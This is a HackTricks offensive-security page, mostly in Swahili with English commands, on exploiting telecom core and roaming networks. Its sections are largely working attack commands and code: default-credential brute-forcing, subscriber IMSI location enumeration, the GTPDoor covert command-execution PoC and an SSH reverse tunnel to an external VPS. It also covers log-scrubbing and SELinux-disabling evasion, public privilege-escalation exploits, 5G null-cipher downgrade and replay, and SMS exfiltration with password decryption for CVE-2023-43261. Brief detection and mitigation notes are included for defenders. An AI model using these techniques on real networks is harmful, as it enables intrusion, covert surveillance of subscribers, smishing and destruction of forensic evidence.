HackTricksTelecom Network Exploitation (GTP / Roaming Environments)
Reading time: 14 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
note
Protokoli za msingi za simu (GPRS Tunnelling Protocol β GTP) mara nyingi hupitia mitandao ya msingi ya roaming ya GRX/IPX yenye uaminifu mdogo. Kwa kuwa zinatumia UDP wazi zenye takriban bila uthibitishaji, kila chanzo ndani ya mipaka ya telecom kwa kawaida kinaweza kufikia moja kwa moja nyuso za usaini za msingi. Vidokezo vifuatavyo vinakusanya mbinu za kushambulia zilizobainika uwanjani dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
1. Recon & Initial Access
1.1 Default OSS / NE Accounts
Seti kubwa kwa kushangaza ya vipengele vya mtandao vinavyotolewa na muuzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa hard-coded kama root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, β¦ Wordlist maalum inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
Ikiwa kifaa kinatoa tu management VRF, pivot kupitia jump host kwanza (tazama sehemu Β«SGSN Emu TunnelΒ» hapa chini).
1.2 Ugunduzi wa Vituo ndani ya GRX/IPX
Wengi wa watoa huduma wa GRX bado wanaruhusu ICMP echo kupitia backbone. Changanya masscan na built-in gtpv1 UDP probes ili kwa haraka kupanga ramani ya GTP-C listeners:
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
2. Kuorodhesha Watumiaji β cordscan
Zana ifuatayo ya Go inatengeneza vifurushi vya GTP-C Create PDP Context Request na inarekodi majibu. Kila jibu linafunua SGSN / MME ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
Bendera muhimu:
--imsiIMSI ya mteja lengwa--operNyumbani / HNI (MCC+MNC)-wAndika vifurushi ghafi kwa pcap
Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
3. Code Execution over GTP β GTPDoor
GTPDoor ni huduma ndogo ya ELF inayosikiliza kwenye UDP 2123 na kuchambua kila kifurushi cha GTP-C kinachoingia. Wakati payload inaanza na pre-shared tag, kilichobaki kinatolewa siri (AES-128-CBC) na kinatekelezwa kupitia /bin/sh -c. stdout/stderr hufichuliwa ndani ya ujumbe za Echo Response ili hakuna session ya nje itakayoundwa.
Paket ndogo ya PoC (Python):
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
Utambuzi:
- yoyote mwenyeji anayetuma unbalanced Echo Requests kwa SGSN IPs
- GTP version flag imewekwa kuwa 1 wakati message type = 1 (Echo) β utofauti na spec
4. Pivoting Kupitia Core
4.1 sgsnemu + SOCKS5
OsmoGGSN inatoa SGSN emulator inayoweza establish a PDP context towards a real GGSN/PGW. Mara mazungumzo yatakapokamilika, Linux hupokea interface mpya tun0 inayofikiwa kutoka kwa roaming peer.
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
Kwa proper firewall hair-pinning, tuneli hii inapita signalling-only VLANs na inakuweka moja kwa moja kwenye data plane.
4.2 SSH Reverse Tunnel over Port 53
DNS karibu kila mara huwa wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
Hakikisha kwamba GatewayPorts yes imewezeshwa kwenye VPS.
5. Covert Channels
| Njia | Usafiri | Utofsishaji | Maelezo |
|---|---|---|---|
ICMP β EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa pasivu kabisa, hakuna trafiki inayotoka |
DNS β NoDepDNS | UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets | inaangalia sub-domain *.nodep |
GTP β GTPDoor | UDP 2123 | AES-128-CBC blob in private IE | inajumuika na mazungumzo halali ya GTP-C |
All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
6. Defense Evasion Cheatsheet
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
7. Privilege Escalation kwenye NE ya Legacy
# DirtyCow β CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit β CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit β CVE-2021-3156
python3 exploit_userspec.py
Kidokezo cha kusafisha:
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
8. Sanduku la Zana
cordscan,GTPDoor,EchoBackdoor,NoDepDNSβ custom tooling described in previous sections.FScan: uchunguzi wa TCP wa intraneti (fscan -p 22,80,443 10.0.0.0/24)Responder: LLMNR/NBT-NS rogue WPADMicrosocks+ProxyChains: lightweight SOCKS5 pivotingFRP(β₯0.37) : NAT traversal / kuunganisha mali
9. 5G NAS Registration Mashambulizi: SUCI leaks, downgrade to EEA0/EIA0, na NAS replay
Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) kwa juu ya NGAP. Mpaka usalama wa NAS haujawa haiwa kwa Security Mode Command/Complete, ujumbe wa awali haujahakikishwa na haujasimbwa. Dirisha hili la kabla ya usalama linawezesha njia nyingi za mashambulizi wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mfano, on-path ndani ya core, gNB bandia, au testbed).
Mtiririko wa usajili (uliojifupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa) na sifa.
- Authentication: AMF/AUSF hutuma RAND/AUTN; UE hurudisha RES*.
- Security Mode Command/Complete: uadilifu wa NAS na ufichaji vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Vidokezo vya usanidi wa maabara (si-RF):
- Core: usanidi wa chaguo-msingi wa Open5GS unatosha kuzalisha mtiririko.
- UE: simulator au UE ya majaribio; tafsiri kwa kutumia Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Vichujio vinavyofaa vya kuonyesha katika Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
9.1 Faragha ya kitambulisho: kasoro za SUCI zinazoonyesha SUPI/IMSI
Inavyotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa kwa kutumia public key ya home-network). Kupata SUPI/IMSI katika maandishi wazi katika Registration Request inaonyesha dosari ya faragha inayoruhusu kufuatwa kwa mkondo wa mteja kwa muda mrefu.
Jinsi ya kujaribu:
- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na angalia Mobile Identity IE.
- Ukaguzi wa haraka kwa Wireshark:
- Inapaswa kutafsiriwa kama SUCI, si IMSI.
- Mifano ya vichujio:
nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suciinapaswa kuwepo; kutokuwepo pamoja na uwepo waimsikunabainisha leak.
Nini kukusanya:
- MCC/MNC/MSIN ikiwa imefichuliwa; hifadhi kwa kila-UE na fuatilia kwa muda/mahali.
Uzuiaji:
- Lete sera ya SUCI-tu kwa UEs/USIMs; tuma onyo kwa kila IMSI/SUPI katika NAS ya awali.
9.2 Kupungua kwa uwezo hadi algoriti za null (EEA0/EIA0)
Kwa nyuma:
- UE huonyesha EEA (encryption) na EIA (integrity) zinazounga mkono katika UE Security Capability IE ya Registration Request.
- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoriti za null.
Tatizo:
- Kwa kuwa Registration Request haijalindwa kwa uadilifu, mshambuliaji aliyeko kwenye njia anaweza kufuta bits za capability ili kulazimisha uteuzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stack zinaweza vibaya kuruhusu algoriti za null nje ya huduma za dharura.
Hatua za kushambulia:
- Shika InitialUEMessage na badilisha NAS UE Security Capability ili itangaza EEA0/EIA0 pekee.
- Kwa Sni5Gect, uchome ujumbe wa NAS na rekebisha bits za capability kabla ya kupeleka mbele.
- Angalia kama AMF inakubali cifers/uadilifu za null na kukamilisha Security Mode na EEA0/EIA0.
Uthibitisho/uwazi:
- Katika Wireshark, thibitisha algoriti zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa matokeo ya sniffer passivu:
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
Hatua za kupunguza (zinazotakiwa):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale ambapo zinahitajika kabisa (kwa mfano, simu za dharura).
- Pendelea kulazimisha EEA2/EIA2 kama kiwango cha chini; rekodi (log) na toa tahadhari kwa muktadha wowote wa usalama wa NAS unaojadiliana null algorithms.
9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina uadilifu (integrity) na freshness, captured InitialUEMessage+Registration Request inaweza ku-replayed kwa AMF.
PoC rule kwa 5GReplay ili kupeleka matching replays:
<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">
<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>
<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
Kitu cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa freshness/context validation unaonyesha udhaifu.
Uzuiaji:
- Lazimisha replay protection/context binding kwenye AMF; tumia rate-limit na correlate per-GNB/UE.
9.4 Vidokezo vya zana (inayoweza kurudiwa)
- Open5GS: anzisha AMF/SMF/UPF ili kuiga core; angalia N2 (NGAP) na NAS.
- Wireshark: thibitisha decodes za NGAP/NAS; tumia filters hapo juu kutenganisha Registration.
- 5GReplay: rekodi usajili, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyosema.
- Sni5Gect: live sniff/modify/inject control-plane ya NAS ili kulazimisha null algorithms au kuyumba authentication sequences.
9.5 Orodha ya ulinzi
- Kagua mara kwa mara Registration Request kwa SUPI/IMSI zilizo wazi kwa plaintext; zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zenye ufafanuzi mdogo; hitaji angalau EEA2/EIA2.
- Gundua miundombinu ya ujangili au iliyopangwa vibaya: gNB/AMF zisizoidhinishwa, wenzao wa N2 wasiotarajiwa.
- Toa tahadhari juu ya NAS security modes zinazosababisha null algorithms au marudio ya mara kwa mara ya InitialUEMessage.
10. Router za Kiganjani za Viwanda β Matumizi mabaya ya API ya SMS bila uthibitisho (Milesight UR5X/UR32/UR35/UR41) na Urejeshaji wa nyaraka za uthibitisho (CVE-2023-43261)
Kutumia vibaya exposed web APIs za router za kiganjani za viwanda kunaruhusu smishing ya chanzo cha carrier kwa siri na kwa wingi. Milesight UR-series routers expose endpoint ya aina ya JSON-RPC kwenye /cgi. Wakati zimesanidiwa vibaya, API inaweza kuulizwa bila authentication kuorodhesha SMS inbox/outbox na, katika baadhi ya deployments, kutuma SMS.
Maombi ya kawaida bila uthibitisho (muundo uleule kwa inbox/outbox):
POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json
{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
Majibu yanajumuisha mashamba kama timestamp, content, phone_number (E.164), na status (success or failed). Kutumwa kwa failed mara kwa mara kwa nambari ile ile mara nyingi ni ukaguzi wa uwezo wa mshambuliaji ili kuthibitisha kwamba router/SIM inaweza kuwasilisha kabla ya blasting.
Mfano curl to exfiltrate SMS metadata:
curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
Vidokezo kuhusu auth artifacts:
- Baadhi ya trafiki inaweza kujumuisha auth cookie, lakini sehemu kubwa ya vifaa vilivyo wazi vinajibu bila uthibitishaji wowote kwa
query_inbox/query_outboxwakati kiolesura cha usimamizi ikiwa inaonekana kwa Internet. - Katika mazingira yanayohitaji auth, previously-leaked credentials (angalia hapa chini) hurejesha ufikiaji.
Njia ya urejeshaji wa credentials β CVE-2023-43261:
- Familia zilizoathirika: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
- Tatizo: web-served logs (mfano,
httpd.log) zinaweza kufikiwa bila uthibitishaji chini ya/lang/log/na zina matukio ya login ya admin yenye password iliyosimbwa kwa kutumia hardcoded AES key/IV iliyopo katika client-side JavaScript. - Practical access and decrypt:
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}
Python ndogo kabisa kwa ajili ya decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...' # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
Mawazo ya ufuatiliaji na utambuzi (mtandao):
- Onyo kwa
POST /cgizisizothibitishwa ambazo mwili wa JSON unabase/functionumewekwa kwaquery_inboxauquery_outbox. - Fuatilia mlipuko wa
POST /cgiunaorudiwa unaofuatiwa na rekodi zastatus":"failed"kutoka kwa nambari nyingi tofauti kutoka kwa IP moja ya chanzo (majaribio ya uwezo). - Fanya hesabu ya Milesight routers zilizo wazi kwenye Internet; zuilia usimamizi kwa VPN; zima vipengele vya SMS isipokuwa vinahitajika; sasisha hadi β₯ v35.3.0.7; badilisha credentials na kagua SMS logs kwa kutumwa zisizojulikana.
Shodan/OSINT pivots (mifano iliyoshuhudiwa):
http.html:"rt_title"inaendana na paneli za router za Milesight.- Google dorking kwa logi zilizo wazi:
"/lang/log/system" ext:log.
Athari za operesheni: kutumia SIMs halali za carrier ndani ya router kunatoa deliverability/credibility ya juu sana ya SMS kwa ajili ya phishing, wakati ufichaji wa inbox/outbox leaks metadata nyeti kwa kiwango kikubwa.
Mawazo ya utambuzi
- Kifaa chochote isipokuwa SGSN/GGSN kinachoanzisha Create PDP Context Requests.
- Ports zisizo za kawaida (53, 80, 443) zinazopokea SSH handshakes kutoka kwa IP za ndani.
- Echo Requests za mara kwa mara bila Echo Responses zinazolingana β inaweza kuonyesha GTPDoor beacons.
- Kiwango cha juu cha trafiki ya ICMP echo-reply yenye vitambulisho/nambari za msururu kubwa zisizo sifuri.
- 5G: InitialUEMessage yenye NAS Registration Requests zinazorudiwa kutoka vituo vinavyofanana (ishara ya replay).
- 5G: NAS Security Mode ikipatanisha EEA0/EIA0 nje ya muktadha wa dharura.
Marejeo
- Palo Alto Unit42 β Infiltration of Global Telecom Networks
- 3GPP TS 29.060 β GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 β GTPv2-C (v17.6.0)
- Demystifying 5G Security: Understanding the Registration Protocol
- 3GPP TS 24.501 β Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 β Security architecture and procedures for 5G System
- Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)
- CVE-2023-43261 β NVD
- CVE-2023-43261 PoC (win3zz)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.